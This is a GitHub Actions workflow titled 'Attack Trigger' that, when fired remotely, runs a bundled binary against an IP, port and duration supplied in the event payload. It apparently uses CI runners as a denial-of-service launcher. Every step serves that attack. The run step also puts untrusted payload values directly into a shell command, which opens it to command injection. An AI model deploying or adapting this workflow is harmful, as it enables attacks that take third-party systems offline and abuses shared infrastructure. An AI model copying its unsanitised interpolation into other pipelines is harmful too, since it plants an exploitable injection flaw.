name: Attack Trigger
on:
  repository_dispatch:
    types: [attack_trigger]

jobs:
  attack:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Make binary executable
      run: chmod +x MRXYT

    - name: Run attack
      run: |
          echo "Starting attack on ${{ github.event.client_payload.ip }}:${{ github.event.client_payload.port }} for ${{ github.event.client_payload.duration }} seconds"
          ./MRXYT ${{ github.event.client_payload.ip }} ${{ github.event.client_payload.port }} ${{ github.event.client_payload.duration }}
